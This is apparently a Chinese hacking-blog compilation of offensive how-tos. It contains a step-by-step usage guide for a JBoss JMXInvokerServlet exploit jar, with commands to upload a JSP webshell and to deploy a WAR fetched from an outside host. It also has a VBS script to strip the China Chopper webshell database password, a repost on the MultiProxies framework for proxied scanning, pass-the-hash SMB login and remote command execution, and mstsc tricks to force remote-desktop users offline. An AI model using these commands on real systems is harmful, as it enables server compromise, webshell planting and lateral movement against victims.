JBOSS /invoker/JMXInvokerServlet 利用工具

链接: http://pan.baidu.com/s/1F8bMI 密码: 1h2r

工具使用说明

1. 查看系统名称

java -jar jboss_exploit_fat.jar -i http://192.168.0.88:10081/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSName

2. 查看系统版本

java -jar jboss_exploit_fat.jar -i http://192.168.0.88:10081/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSVersion

3.远程创建文件

java -jar jboss_exploit_fat.jar -i http://192.168.0.88:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository store myname.war index .jsp $content$ true -s java.lang.String;java.lang.String;java.lang.String;java.lang.String;java.lang.Boolean

$content$内容是同目录下的shell.jsp文件内容

即:将shell.jsp文件上传到服务器上,最终部署的war访问:
http://192.168.0.88:10081/myname/index.jsp
如果有mynameok 表示部署成功
使用client.htm客户端进行连接即可(需要修改ip等信息)

4.远程部署war

java -jar jboss_exploit_fat.jar -i http://192.168.0.88:10081/invoker/JMXInvokerServlet invoke jboss.system:service=MainDeployer deploy http://scriptsgenie.com/demo/test.war

获得shell地址:
http://192.168.0.88:10081/test/shell.jsp
5.远程删除文件D:\jboss\server\default\deploy\management\myname.war\index.jsp文件

java -jar jboss_exploit_fat.jar -i http://192.168.0.88:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository remove myname index .jsp
6.支持输入用户名和密码 带验证的情况

java -jar jboss_exploit_fat.jar -u name -p password -i http://192.168.0.88:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository remove myname index .jsp
7.支持代理模式

java -jar jboss_exploit_fat.jar -P http://127.0.0.1:8080 -i http://192.168.0.88:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository remove myname index .jsp

去除中国菜刀密码的方法

将下面的代码保存为1.vbs,然后将中国菜刀的数据库拖上去即可。

Set args = WScript.Arguments
if args.count<>1 then msgbox "db.mdb":wscript.quit
Set conn =CreateObject("ADODB.Connection")
pwd="密"&chr(13)&chr(9)&chr(10)&"码"&chr(2)
connStr = "Provider=Microsoft.Jet.OLEDB.4.0; Data Source=" & args(0)&" ;Mode=Share Deny Read|Share Deny Write;Persist Security Info=False;Jet OLEDB:Database Password="&pwd&";"
conn.open connstr
conn.execute("ALTER DATABASE Password [123456] ["&pwd&"]")
conn.close
msgbox "done"

转自:http://www.zhongguocaidao.com/%E4%B8%AD%E5%9B%BD%E8%8F%9C%E5%88%80%E5%8E%BB%E9%99%A4%E6%95%B0%E6%8D%AE%E5%BA%93-%E5%AF%86%E7%A0%81-%E6%96%B9%E6%B3%95.html

【转】MultiProxies 支持多代理的攻击框架

作者:http://zone.wooyun.org/user/DM_

简介 
MultiProxies由python编写,支持多环境(windows/linux)下运行,支持http,socks4,socks5全局代理。 
 MultiProxies1

应用场景 
MultiProxies的应用和代理(http/socks4/socks5)紧密联系,但是所有模块的开发过程中完全不必考虑代理的引用过程(注【1】)。在需要使用代理时只需要用相关命令设置全局代理,不需要使用时再将全局代理设为非即可。 

MultiProxies可以做到: 
1) 用大量的http代理,随机选择进行web扫描攻击(目录扫描,CMS识别等)。 
2) 用单一指定的http/socks4/socks5代理进行内网扫描攻击(端口扫描、smb、smbexec/wmiexec)等。 

快速运行 
MltPconsole.py –m 模块名 –options 需要修改的参数(&分隔参数) –run
 MultiProxies2

命令行调用 
MltPconsole.py –c
use 模块名/模块号
set 设置参数
exploit 运行模块

 MultiProxies3

全局参数 
MultiProxies的全局变量储存在客户端(Client)中,客户端与模块根据全局参数的设置作出不同的响应。 
并且全局参数分为用户定义和系统预定义,用户自定义参数可以在模块调用时根据模块所需参数跟随。 
系统预定义参数目前有proxies(代理设置),verbose(冗余输出),color(颜色设置) 

使用setg/usetg 设置或取消全局参数 
 
MultiProxies4
全局代理的检查、设置、取消。 
 
MultiProxies5
Verbose和color参数同理,可自行尝试发现。 

Web目录扫描 
支持从文件读取,或者单一站点扫描,这里由于演示,便提前使用ctrl+c停止。 
 MultiProxies6

CMS识别 
Cms识别字典格式为json,根据字典是否有值,按照url状态码,url内容正则匹配,url内容md5值的顺序进行匹配。 
"Wordpress": [
{
"path": "/wp-content/themes/twentyten/images/wordpress.png",
"md5": "cc452c1368589d88d26f306c49319340"
},
{
"path": "/wp-admin/images/wp-logo-2x.png",
"md5": "18ac0a741a252d0b2d22082d1f02002a"
}
],

 
MultiProxies7
内网攻击 
我们知道metasploit提供了meterpreter作为中继tunnel,但在有些情况下我们并不需要这么复杂的tunnel。并且meterpreter还要考虑免杀问题,那么在面对简单场景时我们只需要一个能用的tunnel就可以了,就是普通的socks4/socks5代理。 

至于如何开放socks5代理,这个方法有很多: 

linux可以用ssh,s5.py等方式。 
Windows可以用plink.exe,htran.exe 
通用情况可以使用 aspx/php/ jsp/ashx等webshell开放socks5代理。 

这里演示使用webshell(注【2】)开放socks5代理,然后进行内网端口扫描,smb弱口令检测,及使用smb_exec执行系统命令获得返回结果。 

使用portscan扫描端口。 
 MultiProxies8

使用hash登录,并使用smb_exec模块获得非交互式cmd shell。 
 MultiProxies9

 MultiProxies10

这里portscan可以看出使用与不使用代理结果的区别,之后继续通过socks5代理并且使用hash成功登录,最后使用smb_exec执行了命令并获得了回显。 
并且所有的请求都是通过代理完成的。 

开发相关 
开发过程使用github协同开发,插件开发请fork MltP-modules,然后pull requests。如果有任何问题欢迎提在github的issues上,回复此帖,或者邮件联系 contact@x0day.me。 

文档及详细使用说明请见项目wiki。 


注【1】:尝试多次发现如果每次请求都更换代理,即使在fuzz前检查挑出一部分可用的代理也会大大的降低成功率。所以暂不支持全局的HTTP随机代理开关。如有需求可以通过修改模块部分代码引入实现。 
注【2】 reGeorgSocksProxy.py

远程桌面强制踢用户下线

实际上远程桌面超过终端连接数的问题是很多站长遇到的问题;
也有好多人因此而使用了一些黑客工具,比如什么3389强制连接工具等;
实际上在windows操作系统中的mstsc已经拥有远程桌面强制踢用户下线的功能,只不过很多中国的站长和脚本小子不知道罢了。当然我也不是什么大牛,只要细心一点,看看说明文档就知道mstsc可以有/admin 或者/console参数,是可以远程登录控制台的,控制台的权限是很高的,所以可以强制踢用户下线,得到一个会话。

其实不仅如此,还可以指定用户的会话ID强制踢特定用户下线并进行登录。

mstsc /admin /shadow:sessionID
mstsc /console /shadow:sessionID